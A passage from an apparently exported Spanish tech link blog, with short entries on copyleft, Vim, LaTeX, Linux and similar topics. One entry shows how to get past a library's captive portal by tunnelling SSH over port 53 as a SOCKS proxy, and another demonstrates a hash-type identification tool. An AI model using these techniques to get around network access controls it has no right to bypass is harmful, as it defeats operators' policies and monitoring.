ser tan libre como la versión original”.\nLa GPL promueve los derechos del usuario, pero los defensores de esos derechos son los propietarios del copyright, que pueden ser los desarrolladores originales o cualquier otro organismo al que se le haya otorgado la propiedad del copyright. El beneficio para el titular del copyright es que el código está disponible para ser modificado y se puede retroalimentar progresivamente. El usuario gana dado que el código es transparente, y puede ser adaptado para mayores usos.\nBradley Kuhn toma una analogía de las artes marciales, y dice que ”copyleft es una toma de judo sobre el copyright ”. En el judo, el objetivo es aprovechar el impulso del atacante para defenderse, y eso es exactamente lo que hace copyleft. Mientras la ley de copyright se vuelve cada vez más y más amplia, el copyleft se sirve de ese impulso y lo devuelve con la misma fuerza. Por lo tanto el copyleft es siempre tan fuerte como el copyright. ”\n» Traducción | elbauldelprogramador.com | Original h-online.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/24/imponiendo-gpl-usando-tecnicas-de-judo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl propósito del software libre es hacer que el código que corre en\nlas máquinas que gobiernan nuestras vidas sea transparente. En\npalabras de Lawrence Lessig, el software libre es ”libre en el sentido\nde que el control del código de desarrollo sea transparente para\ntodos, y que cualquier persona tenga el derecho de tomar ese control,\ny modificarlo si él o ella cree conveniente.”\u003c/p\u003e\n\u003cp\u003eEl mecanismo por el cual el software libre logra esto es el copyleft.\nEl copyleft es un hack en el copyright (la ley de derechos de autor)\nque le quita los derechos exclusivos al titular del copyright y los\ncomparte con el usuario, otorgándole el derecho de modificar, copiar,\ncompartir y redistribuir el software, bajo la condición de que deben\ntransferirse los mismos derechos a usuarios subsiguientes. ”Si uno usa\ny adapta un programa de software libre, y luego libera esa nueva\nversión adaptada para el público, debe ser tan libre como la versión\noriginal”.\u003c/p\u003e","title":"Imponiendo GPL; usando técnicas de Judo"},{"content":" Ahora que todos los servicios tipo dyndns.org y no-ip.org se han vuelto de pago, echamos de menos un servicio de DNS dinámico que poder usar por poco dinero léase: gratis. La mala noticia es que no hay ninguno totalmente gratuito. La buena noticia es que, bajo ciertas circunstancias, podemos montarlo nosotros mismos.\n» Roberto Suárez Soto | linuxtecnico.es\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/monta-tu-propio-dns-dinamico/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAhora que todos los servicios tipo dyndns.org y no-ip.org se han\nvuelto de pago, echamos de menos un servicio de DNS dinámico que poder\nusar por poco dinero léase: gratis. La mala noticia es que no hay\nninguno totalmente gratuito. La buena noticia es que, bajo ciertas\ncircunstancias, podemos montarlo nosotros mismos.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Roberto Suárez Soto | \u003ca href=\"http://www.linuxtecnico.es/2012/05/monta-tu-propio-dns-dinamico.html\"\u003elinuxtecnico.es\u003c/a\u003e\u003c/p\u003e","title":"Monta tu propio DNS dinámico"},{"content":" En cierta ocasión se realizó una encuesta entre los conductores españoles que arrojó resultados sorprendentes. Aproximadamente el 95% de los conductores consideraba que conducía mejor que la media, lo que quiere decir que o bien el 5% conduce verdaderamente mal y en una escala del 1 al 10 puntúa negativo, o que en general el conductor español medio se mira por las mañanas ante el espejo de la bruja de Blancanieves. Personalmente me inclino por lo segundo. Más que nada porque el espejo me salió carísimo. En fin; pongámonos el traje de Antropólogo Indecente y vayamos a echarle un vistazo a la fauna que puebla la jungla de asfalto.\n» fronterasblog.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/manual-del-perfecto-conductor-espanol/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn cierta ocasión se realizó una encuesta entre los conductores\nespañoles que arrojó resultados sorprendentes. Aproximadamente el 95%\nde los conductores consideraba que conducía mejor que la media, lo que\nquiere decir que o bien el 5% conduce verdaderamente mal y en una\nescala del 1 al 10 puntúa negativo, o que en general el conductor\nespañol medio se mira por las mañanas ante el espejo de la bruja de\nBlancanieves. Personalmente me inclino por lo segundo. Más que nada\nporque el espejo me salió carísimo. En fin; pongámonos el traje de\nAntropólogo Indecente y vayamos a echarle un vistazo a la fauna que\npuebla la jungla de asfalto.\u003c/p\u003e","title":"Manual del perfecto conductor español"},{"content":" This is an informational document. Although technical in nature, it attempts to make the concepts involved understandable and applicable in real-world situations. Because of this, some aspects of the material are simplified or omitted, for the sake of clarity. If you are interested in the minutia of the subject, please explore the References and Further Information at the end.\n» mnot.net\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/caching-tutorial/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is an informational document. Although technical in nature, it\nattempts to make the concepts involved understandable and applicable\nin real-world situations. Because of this, some aspects of the\nmaterial are simplified or omitted, for the sake of clarity. If you\nare interested in the minutia of the subject, please explore the\nReferences and Further Information at the end.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.mnot.net/cache_docs/\"\u003emnot.net\u003c/a\u003e\u003c/p\u003e","title":"Caching Tutorial"},{"content":" A ton of discussion lately has been given to preprocessors. These incredibly useful tools make coding easier, faster and more maintainable, but they’re certainly not for everyone. Whether or not you’ve jumped on the preprocessor bandwagon, you should give a fresh look to an old favorite that helps you dramatically cut your coding time without reinventing your workflow with compilers and other complications: Zen Coding.\n» designhack.net\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/cant-get-into-preprocessors-try-zen-coding/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA ton of discussion lately has been given to preprocessors. These\nincredibly useful tools make coding easier, faster and more\nmaintainable, but they’re certainly not for everyone. Whether or not\nyou’ve jumped on the preprocessor bandwagon, you should give a fresh\nlook to an old favorite that helps you dramatically cut your coding\ntime without reinventing your workflow with compilers and other\ncomplications: Zen Coding.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://designshack.net/articles/css/cant-get-into-preprocessors-try-zen-coding/\"\u003edesignhack.net\u003c/a\u003e\u003c/p\u003e","title":"Can’t Get Into Preprocessors? Try Zen Coding"},{"content":" This is a guide to programming plugins for gedit 3, the default text editor for GNOME 3. gedit 3 uses the Libpeas GObject plugin system and the plugins can be written using C or Python. This guide will only cover writing plugins with Python.\n» micahcarrick.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/writing-plugins-for-gedit-3-with-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is a guide to programming plugins for gedit 3, the default text\neditor for GNOME 3. gedit 3 uses the Libpeas GObject plugin system and\nthe plugins can be written using C or Python. This guide will only\ncover writing plugins with Python.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.micahcarrick.com/writing-plugins-for-gedit-3-in-python.html\"\u003emicahcarrick.com\u003c/a\u003e\u003c/p\u003e","title":"Writing Plugins for gedit 3 with Python"},{"content":" El uso de un cable HDMI permite transmitir una señal digital, señal de vídeo con mayor resolución, sonido multicanal en un sólo cable y la inclusión de datos auxiliares. Desde la versión HDMI 1.0 hasta la 1.4 se han ido añadiendo mejoras al cable. Por ejemplo, en la versión 1.4 se puede enviar una señal de vídeo a una resolución de 4096—2160 pixeles a 24fps o 3840—2160 a 30fps. Además permite enviar contenido 3D y junto a las mejoras de audio es capaz de enviar y recibir datos a través de una conexión Ethernet incorporada en el propio cable.\n» xakatahome.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/23/cables-hdmi-la-verdadera-diferencia-entre-un-cable-caro-y-barato/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl uso de un cable HDMI permite transmitir una señal digital, señal de\nvídeo con mayor resolución, sonido multicanal en un sólo cable y la\ninclusión de datos auxiliares. Desde la versión HDMI 1.0 hasta la 1.4\nse han ido añadiendo mejoras al cable. Por ejemplo, en la versión 1.4\nse puede enviar una señal de vídeo a una resolución de 4096—2160\npixeles a 24fps o 3840—2160 a 30fps. Además permite enviar contenido\n3D y junto a las mejoras de audio es capaz de enviar y recibir datos a\ntravés de una conexión Ethernet incorporada en el propio cable.\u003c/p\u003e","title":"Cables HDMI, la verdadera diferencia entre un cable caro y barato"},{"content":" Good morning! Over in ”castle Lanyrd” we recently launched our mobile site, which caches data on events you’re attending for viewing offline. I’ve boiled the offline bits down to a simple demo and posted all the code on Github. But before we delve into the code, let me tell you a true story. Totally true.\n» alistapart.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/22/application-cache-is-a-douchebag/","summary":"\u003cblockquote\u003e\n\u003cp\u003eGood morning! Over in ”castle Lanyrd” we recently launched our mobile\nsite, which caches data on events you’re attending for viewing\noffline. I’ve boiled the offline bits down to a simple demo and posted\nall the code on Github. But before we delve into the code, let me tell\nyou a true story. Totally true.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.alistapart.com/articles/application-cache-is-a-douchebag/\"\u003ealistapart.com\u003c/a\u003e\u003c/p\u003e","title":"Application Cache is a Douchebag"},{"content":" In the late 1960s, Bell Laboratories computer scientists Dennis Ritchie and Ken Thompson started work on a project that was inspired by an operating system called Multics, a joint project of MIT, GE, and Bell Labs. The host and narrator of this film, Victor Vyssotsky, also had worked on the Multics project. Ritchie and Thompson, recognizing some of the problems with the Multics OS, set out to create a more useful, flexible, and portable system for programmers to work with.\n» techchannel.att.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/21/the-unix-system-making-computers-more-productive/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the late 1960s, Bell Laboratories computer scientists Dennis\nRitchie and Ken Thompson started work on a project that was inspired\nby an operating system called Multics, a joint project of MIT, GE, and\nBell Labs. The host and narrator of this film, Victor Vyssotsky, also\nhad worked on the Multics project. Ritchie and Thompson, recognizing\nsome of the problems with the Multics OS, set out to create a more\nuseful, flexible, and portable system for programmers to work with.\u003c/p\u003e","title":"The UNIX System: Making Computers More Productive"},{"content":"vimrepress es un complemento para trabajar con WordPress. Esta mañana he leído sobre él en el blog de CyberHades y me han entrado ganas de probarlo.\nInstalación Para que funcione, además de instalar el complemento deberemos activar el servicio XML-RPC en WordPress para publicar de forma remota. Para activarlo vamos a Ajustes \u0026gt; Escritura y marcamos la casilla XML-RCP.\nAhora vamos a instalar el complemento. Descargamos la última versión estable, en estos momentos la 2.1.5, y la descomprimimos en el directorio ~/.vim:\n$ wget \u0026#34;www.vim.org/scripts/download_script.php?src_id=16490\u0026#34; -O vimpress-stable_2.1.5.zip $ unzip vimpress-stable_2.1.5.zip -d ~/.vim Añadimos al fichero de configuración de vim, ~/.vimrc:\nlet VIMPRESS = [ { \u0026#39;username\u0026#39;: \u0026#39;user\u0026#39;, \u0026#39;password\u0026#39;: \u0026#39;pass\u0026#39;, \u0026#39;blog_url\u0026#39;: \u0026#39;http://your-first-blog.com/\u0026#39; }, { \u0026#39;username\u0026#39;: \u0026#39;user\u0026#39;, \u0026#39;blog_url\u0026#39;: \u0026#39;http://your-second-blog.com/\u0026#39; } ] Uso Algunos comandos que muestran cómo utilizar el complemento:\n:BlogList - Los 30 últimos artículos. :BlogList post 100 - 100 últimos artículos. :BlogList page - Las 30 últimas páginas. :BlogNew post - Añadir un artículo. :BlogNew page - Añadir una página. :BlogSave - Guardar (por defecto, como publicado). :BlogSave draft - Guardar como borrador. :BlogPreview local - Vista previa en local. :BlogPreview publish - Publicar y vista previa. :BlogOpen 679 :BlogOpen http://your-first-blog.com/archives/679 :BlogOpen http://your-second-blog.com/?p=679 :BlogOpen http://your-third-blog.com/with-your-custom-permalink Para que funcione, además de instalar el complemento deberemos activar el servicio XML-RPC para publicar de forma remota. Para activarlo vamos a Ajustes \u0026gt; Escritura y\nMarkdown Con vimpress podemos utilizar Markdown para escribir los artículos en lugar de hacerlo en HTML. Tendremos que tener instalado el paquete python-markdown.\nUn pequeño ejemplo de su sintaxis:\n# Título H1 ## Título H2 ### Título H3 _cursiva_\n**negrita**\n***negrita y cursiva***\ntexto del enlace = [texto del enlace](http://www.example.com)\n= ![texto alternativo de la imagen](http://www.example.com/image.png \u0026quot;Título de la imagen\u0026quot;)\nenlace referenciado = [enlace referenciado][id] y en otra parte añadimos [id]: http://example.com/ \u0026quot;Title\u0026quot;\nListado sin orden:\n\u0026quot;- foo\u0026quot; \u0026quot;- bar\u0026quot; Listado ordenado:\n\u0026quot;1. primero\u0026quot; \u0026quot;2. segundo\u0026quot; \u0026gt; cita\n\u0026gt; \u0026gt; cita anidada\ncode Referencias » Vim, Markdown y WordPress » vimrepress » Markdown syntax » Markdown web dingus\n","permalink":"http://karpoke.ignaciocano.com/2012/05/20/vimrepress-publicar-en-wordpress-desde-vim/","summary":"\u003cp\u003e\u003ca href=\"http://www.vim.org/scripts/download_script.php?src_id=16490\"\u003evimrepress\u003c/a\u003e es un complemento para trabajar con WordPress. Esta mañana\nhe leído sobre él en el blog de CyberHades y me han entrado ganas de\nprobarlo.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePara que funcione, además de instalar el complemento deberemos activar el\nservicio XML-RPC en WordPress para publicar de forma remota. Para\nactivarlo vamos a Ajustes \u0026gt; Escritura y marcamos la casilla XML-RCP.\u003c/p\u003e\n\u003cp\u003eAhora vamos a instalar el complemento. Descargamos la última versión\nestable, en estos momentos la 2.1.5, y la descomprimimos en el\ndirectorio \u003ccode\u003e~/.vim\u003c/code\u003e:\u003c/p\u003e","title":"vimrepress, publicar en WordPress desde vim"},{"content":" It’s important for programmers to challenge themselves.\nCreative and technical stagnation is the only alternative.\nIn the spirit of the new year, I’ve compiled twelve month-sized resolutions.\nEach month is an annually renewable technical or personal challenge:\nGo analog. Stay healthy. Embrace the uncomfortable. Learn a new programming language. Automate. Learn more mathematics. Focus on security. Back up your data. Learn more theory. Engage the arts and humanities. Learn new software. Complete a personal project. » Matt Might | matt.might.net\n","permalink":"http://karpoke.ignaciocano.com/2012/05/20/12-resolutions-for-programmers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s important for programmers to challenge themselves.\u003c/p\u003e\n\u003cp\u003eCreative and technical stagnation is the only alternative.\u003c/p\u003e\n\u003cp\u003eIn the spirit of the new year, I’ve compiled twelve month-sized\nresolutions.\u003c/p\u003e\n\u003cp\u003eEach month is an annually renewable technical or personal challenge:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eGo analog.\u003c/li\u003e\n\u003cli\u003eStay healthy.\u003c/li\u003e\n\u003cli\u003eEmbrace the uncomfortable.\u003c/li\u003e\n\u003cli\u003eLearn a new programming language.\u003c/li\u003e\n\u003cli\u003eAutomate.\u003c/li\u003e\n\u003cli\u003eLearn more mathematics.\u003c/li\u003e\n\u003cli\u003eFocus on security.\u003c/li\u003e\n\u003cli\u003eBack up your data.\u003c/li\u003e\n\u003cli\u003eLearn more theory.\u003c/li\u003e\n\u003cli\u003eEngage the arts and humanities.\u003c/li\u003e\n\u003cli\u003eLearn new software.\u003c/li\u003e\n\u003cli\u003eComplete a personal project.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Matt Might | \u003ca href=\"http://matt.might.net/articles/programmers-resolutions/\"\u003ematt.might.net\u003c/a\u003e\u003c/p\u003e","title":"12 resolutions for programmers"},{"content":" As there seems to be some confusion when hard tab characters (ASCII code 9) are appropriate in source code files here is a rule:\n​1) Never use hard tabs\n​1. 1) Unless your source code is hard tab sensitive (only such format I know is Makefile)\n» opensourcehacker.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/20/never-use-hard-tabs/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs there seems to be some confusion when hard tab characters (ASCII\ncode 9) are appropriate in source code files here is a rule:\u003c/p\u003e\n\u003cp\u003e​1) Never use hard tabs\u003c/p\u003e\n\u003cp\u003e​1. 1) Unless your source code is hard tab sensitive (only such format\nI know is Makefile)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://opensourcehacker.com/2012/05/13/never-use-hard-tabs/\"\u003eopensourcehacker.com\u003c/a\u003e\u003c/p\u003e","title":"Never use hard tabs"},{"content":" I’ve had an off/on relationship with Vim for the past many years.\nBefore, I never felt like we understood each other properly. I felt that the kind of programming I’m doing is not easily done without plugins and some essential settings in .vimrc, but fiddling with all the knobs and installing all the plugins that I thought I needed was a process that in the end stretched out from few hours to weeks, months even; and it the end it just caused frustration instead of making me a happier coder.\nRecently, I decided to give Vim another shot. This time around it was different – something in my brain switched and now for the first time in my life I’m proud of my knowledge of Vim. My philosophy of it has changed to ”less is more”, my approach was more disciplined and my motivation stronger. And so you don’t spend as much time learning as I did, I am going to lay down some fundamentals.\n» mislav.uniqpath.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/20/vim-revisited/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve had an off/on relationship with Vim for the past many years.\u003c/p\u003e\n\u003cp\u003eBefore, I never felt like we understood each other properly. I felt\nthat the kind of programming I’m doing is not easily done without\nplugins and some essential settings in .vimrc, but fiddling with all\nthe knobs and installing all the plugins that I thought I needed was a\nprocess that in the end stretched out from few hours to weeks, months\neven; and it the end it just caused frustration instead of making me a\nhappier coder.\u003c/p\u003e","title":"Vim: revisited"},{"content":" If you spend a lot of time typing plain text, writing programs or HTML, you can save much of that time by using a good editor and using it effectively. This paper will present guidelines and hints for doing your work more quickly and with fewer mistakes.\nThe open source text editor Vim (Vi IMproved) will be used here to present the ideas about effective editing, but they apply to other editors just as well. Choosing the right editor is actually the first step towards effective editing. The discussion about which editor is the best for you would take too much room and is avoided. If you don’t know which editor to use or are dissatisfied with what you are currently using, give Vim a try; you won’t be disappointed.\n» moolenaar.net\n","permalink":"http://karpoke.ignaciocano.com/2012/05/20/seven-habits-of-effective-text-editing/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you spend a lot of time typing plain text, writing programs or\nHTML, you can save much of that time by using a good editor and using\nit effectively. This paper will present guidelines and hints for doing\nyour work more quickly and with fewer mistakes.\u003c/p\u003e\n\u003cp\u003eThe open source text editor Vim (Vi IMproved) will be used here to\npresent the ideas about effective editing, but they apply to other\neditors just as well. Choosing the right editor is actually the first\nstep towards effective editing. The discussion about which editor is\nthe best for you would take too much room and is avoided. If you don’t\nknow which editor to use or are dissatisfied with what you are\ncurrently using, give Vim a try; you won’t be disappointed.\u003c/p\u003e","title":"Seven habits of effective text editing"},{"content":" While Linux is running our phones, friend requests, tweets, financial trades, ATMs and more, most of us don’t know how it’s actually built. This short video takes you inside the process by which the largest collaborative development project in the history of computing is organized. Based on the annual report ”Who Writes Linux,” this is a powerful and inspiring story of how Linux has become a community-driven phenomenon. More information about Linux and The Linux Foundation can be found at http://www.linuxfoundation.org and http://www.linux.com\n» @TheLinuxFoundation | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/17/how-linux-is-built/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhile Linux is running our phones, friend requests, tweets, financial\ntrades, ATMs and more, most of us don’t know how it’s actually built.\nThis short video takes you inside the process by which the largest\ncollaborative development project in the history of computing is\norganized. Based on the annual report ”Who Writes Linux,” this is a\npowerful and inspiring story of how Linux has become a\ncommunity-driven phenomenon. More information about Linux and The\nLinux Foundation can be found at \u003ca href=\"http://www.linuxfoundation.org\"\u003ehttp://www.linuxfoundation.org\u003c/a\u003e and\n\u003ca href=\"http://www.linux.com\"\u003ehttp://www.linux.com\u003c/a\u003e\u003c/p\u003e","title":"How Linux is Built"},{"content":" This document is a gentle introduction to computational number theory. The plan of the paper is to first give a quick overview of arithmetic in the modular integers. Throughout, we will emphasize computation and practical results rather than delving into the why. Simple programs, generally in JavaScript, are available for all of the algorithms mentioned. At the end of the paper we will introduce the Gaussian Integers and Galois Fields and compare them to the modular integers. Companion papers will examine number theory from a more advanced perspective.\n» userpages.umbc.edu/~rcampbel\n","permalink":"http://karpoke.ignaciocano.com/2012/05/16/basics-of-computational-number-theory/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis document is a gentle introduction to computational number theory.\nThe plan of the paper is to first give a quick overview of arithmetic\nin the modular integers. Throughout, we will emphasize computation and\npractical results rather than delving into the why. Simple programs,\ngenerally in JavaScript, are available for all of the algorithms\nmentioned. At the end of the paper we will introduce the Gaussian\nIntegers and Galois Fields and compare them to the modular integers.\nCompanion papers will examine number theory from a more advanced\nperspective.\u003c/p\u003e","title":"Basics of Computational Number Theory"},{"content":" There are several reasons why one should prefer LaTeX to a WYSIWYG word processor like Microsoft Word: portability, lightness, security are just a few of them (not to mention that LaTeX is free). There is still a further reason that definitely convinced me to abandon MS Word when I wrote my dissertation: you will never be able to produce professionally typeset and well-structured documents using most WYSIWYG word processors. LaTeX is a free typesetting system that allows you to focus on content without bothering about the layout: the software takes care of the actual typesetting, structuring and page formatting, producing documents of astonishing elegance.\n» nitens.org\n","permalink":"http://karpoke.ignaciocano.com/2012/05/16/dario-taraborelli-the-beauty-of-latex/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere are several reasons why one should prefer LaTeX to a WYSIWYG\nword processor like Microsoft Word: portability, lightness, security\nare just a few of them (not to mention that LaTeX is free). There is\nstill a further reason that definitely convinced me to abandon MS Word\nwhen I wrote my dissertation: you will never be able to produce\nprofessionally typeset and well-structured documents using most\nWYSIWYG word processors. LaTeX is a free typesetting system that\nallows you to focus on content without bothering about the layout: the\nsoftware takes care of the actual typesetting, structuring and page\nformatting, producing documents of astonishing elegance.\u003c/p\u003e","title":"Dario Taraborelli: The Beauty of LaTeX"},{"content":" Video of a sandbox equipped with a Kinect 3D camera and a projector to project a real-time colored topographic map with contour lines onto the sand surface. The sandbox lets virtual water flow over the surface using a GPU-based simulation of the Saint-Venant set of shallow water equations.\n» @okreylos | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/16/augmented-reality-sandbox-with-real-time-water-flow-simulation/","summary":"\u003cblockquote\u003e\n\u003cp\u003eVideo of a sandbox equipped with a Kinect 3D camera and a projector to\nproject a real-time colored topographic map with contour lines onto\nthe sand surface. The sandbox lets virtual water flow over the surface\nusing a GPU-based simulation of the Saint-Venant set of shallow water\nequations.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/j9JXtTj0mzE?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» @okreylos | \u003ca href=\"https://www.youtube.com/watch?v=j9JXtTj0mzE\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Augmented reality sandbox with real-time water flow simulation"},{"content":"» link | via reddit\n","permalink":"http://karpoke.ignaciocano.com/2012/05/15/la-escala-del-universo/","summary":"\u003cp\u003e» \u003ca href=\"http://i.imgur.com/0fPRk.jpg\"\u003elink\u003c/a\u003e | via \u003ca href=\"http://www.reddit.com/r/space/comments/t4wle/the_scale_of_the_universe/\"\u003ereddit\u003c/a\u003e\u003c/p\u003e","title":"La escala del universo"},{"content":"El portal cautivo es el sistema que utilizan algunos establecimientos como bibliotecas u hoteles en el que la conexión inalámbrica está abierta (sin cifrar) pero para conectarse a Internet es necesario aceptar las condiciones de uso, o introducir una contraseña, en la página de pasarela que aparece cuando intentamos navegar.\nEste no es un artículo exhaustivo que muestre como saltarse cualquier portal cautivo sino más bien aquél que permite el paso de tráfico TCP por el puerto 53 (DNS). Lo que veremos aquí NO es un túnel DNS, que permite encapsular el tráfico TCP en paquetes de DNS.\nAdemás, necesitaremos tener acceso a un equipo remoto con el servicio de SSH y en el que esté redirigido el puerto externo 53 (DNS) al puerto del equipo interno donde corre SSH.\nEn muchas ocasiones, el portal cautivo permitirá el tráfico DNS al exterior, incluso sin haber introducido la contraseña o haber aceptado las condiciones de uso del servicio, ya que suele haber un servidor DNS en la misma red, y éste necesita acceso al exterior. Para probar si está permitido el tráfico DNS, nos conectamos a la red (sin pasar por la pasarela web) y comprobamos si resuelve el dominio que apunta a nuestro equipo remoto.\n$ nslookup mydomain.com Server: 10.28.28.28 Address: 10.28.28.28#53 Non-authoritative answer: Name: mydomain.com Address: 1.2.3.4 Si no tenemos un dominio pero sabemos la IP, utilizaremos la IP en su lugar. Si no obtenemos respuesta, difícilmente vamos a poder conectarnos. Si obtenemos respuesta sabemos que, al menos, se permite el tráfico UDP por el puerto 53 (las peticiones de DNS van por UDP, no utilizan TCP), y hay posibilidades de que también permita el tráfico TCP.\nCrearemos un proxy SOCKS. Por ejemplo, ejecutamos:\n$ ssh -p53 -D 8080 mydomain.com Si no conecta es que el puerto TCP está filtrado. Todavía podríamos probar con un túnel DNS o encontrar algún fallo en la pasarela del portal cautivo. Si todo ha ido bien, ya tenemos el proxy corriendo en el puerto 8080 de nuestra máquina, y que podemos utilizar para:\nnavegar de forma segura, navegar de forma anónima para el administrador de la red, evitar las continuas desconexiones que se producen en el portal cautivo y que obligan a estar continuamente volviendo a conectar (en algunos casos, como el que inspiró la creación de este artículo), saltarnos las restricciones del portal cautivo, por ejemplo direcciones censuradas como facebook, etc, asegurar cualquier tipo de conexión, etc. Como ejemplo. para que Firefox utilice este proxy vamos a Editar \u0026gt; Preferencias \u0026gt; Avanzado \u0026gt; Red \u0026gt; Configuración de la Conexión \u0026gt; Seleccionamos Proxy Manual y ponemos:\nSOCKS Host: localhost Puerto: 8080 Seleccionamos SOCKSv5 Nunca se sabe quién puede estar escuchando nuestra conexión y los datos que viajan por ella, como contraseñas, cookies de sesión, mensajes, correos\u0026hellip;\n","permalink":"http://karpoke.ignaciocano.com/2012/05/15/saltandonos-el-portal-cautivo-de-una-biblioteca/","summary":"\u003cp\u003eEl portal cautivo es el sistema que utilizan algunos establecimientos\ncomo bibliotecas u hoteles en el que la conexión inalámbrica está\nabierta (sin cifrar) pero para conectarse a Internet es necesario\naceptar las condiciones de uso, o introducir una contraseña, en la\npágina de pasarela que aparece cuando intentamos navegar.\u003c/p\u003e\n\u003cp\u003eEste no es un artículo exhaustivo que muestre como saltarse cualquier\nportal cautivo sino más bien aquél que permite el paso de tráfico TCP\npor el puerto 53 (DNS). Lo que veremos aquí NO es un túnel DNS, que\npermite encapsular el tráfico TCP en paquetes de DNS.\u003c/p\u003e","title":"Saltándonos el portal cautivo de una biblioteca"},{"content":"El script Hash_ID.py, desarrollado por Zion3R, nos permite identificar los posibles algoritmos utilizados para crear un hash. En muchas ocasiones no se puede saber qué algoritmo concreto se ha utilizado, pero nos devolverá una lista de candidatos.\nEl script compara el hash con el tipo de hash de algoritmos tales como: ADLER-32, CRC-32, CRC-16, DES(Unix), FCS-16, GHash-32-5, GOST R 34.11-94, Haval-160, Haval-192 110080, Haval-224 114080, Haval-256, Lineage II C4, Domain Cached Credentials, XOR-32, MD5(Half), MD5(Middle), MySQL, MD5(phpBB3), MD5(Unix), MD5(Wordpress), MD5(APR), MD2, MD4, MD5, MD5(HMAC(Wordpress)), NTLM, RAdmin v2.x, RipeMD-128, SNEFRU-128, Tiger-128, MySQL5 - SHA-1(SHA-1($pass)), MySQL 160bit - SHA-1(SHA-1($pass)), RipeMD-160, SHA-1, SHA-1(MaNGOS), Tiger-160, Tiger-192, md5($pass.$salt) - Joomla, SHA-1(Django), SHA-224, RipeMD-256, SNEFRU-256, md5($pass.$salt) - Joomla, SAM - (LM_hash:NT_hash), SHA-256(Django), RipeMD-320, SHA-384, SHA-256, SHA-384(Django), SHA-512, Whirlpool, etc.\nSu uso es sencillo:\n$ python Hash_ID.py ######################################################################### # __ __ __ ______ _____ # # /\\ \\/\\ \\ /\\ \\ /\\__ _\\ /\\ _ `\\ # # \\ \\ \\_\\ \\ __ ____ \\ \\ \\___ \\/_/\\ \\/ \\ \\ \\/\\ \\ # # \\ \\ _ \\ /’__`\\ / ,__\\ \\ \\ _ `\\ \\ \\ \\ \\ \\ \\ \\ \\ # # \\ \\ \\ \\ \\/\\ \\_\\ \\_/\\__, `\\ \\ \\ \\ \\ \\ \\_\\ \\__ \\ \\ \\_\\ \\ # # \\ \\_\\ \\_\\ \\___ \\_\\/\\____/ \\ \\_\\ \\_\\ /\\_____\\ \\ \\____/ # # \\/_/\\/_/\\/__/\\/_/\\/___/ \\/_/\\/_/ \\/_____/ \\/___/ v1.1 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### ------------------------------------------------------------------------- HASH: 065764eb3fb9c3bcd271ea8a894981c4 Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) Least Possible Hashs: [+] RAdmin v2.x [+] NTLM [+] MD4 [+] MD2 [+] MD5(HMAC) [+] MD4(HMAC) [+] MD2(HMAC) [+] MD5(HMAC(Wordpress)) [+] Haval-128 [+] Haval-128(HMAC) [+] RipeMD-128 [+] RipeMD-128(HMAC) [+] SNEFRU-128 [+] SNEFRU-128(HMAC) [+] Tiger-128 [+] Tiger-128(HMAC) [+] md5($pass.$salt) [+] md5($salt.$pass) [+] md5($salt.$pass.$salt) [+] md5($salt.$pass.$username) [+] md5($salt.md5($pass)) [+] md5($salt.md5($pass)) [+] md5($salt.md5($pass.$salt)) [+] md5($salt.md5($pass.$salt)) [+] md5($salt.md5($salt.$pass)) [+] md5($salt.md5(md5($pass).$salt)) [+] md5($username.0.$pass) [+] md5($username.LF.$pass) [+] md5($username.md5($pass).$salt) [+] md5(md5($pass)) [+] md5(md5($pass).$salt) [+] 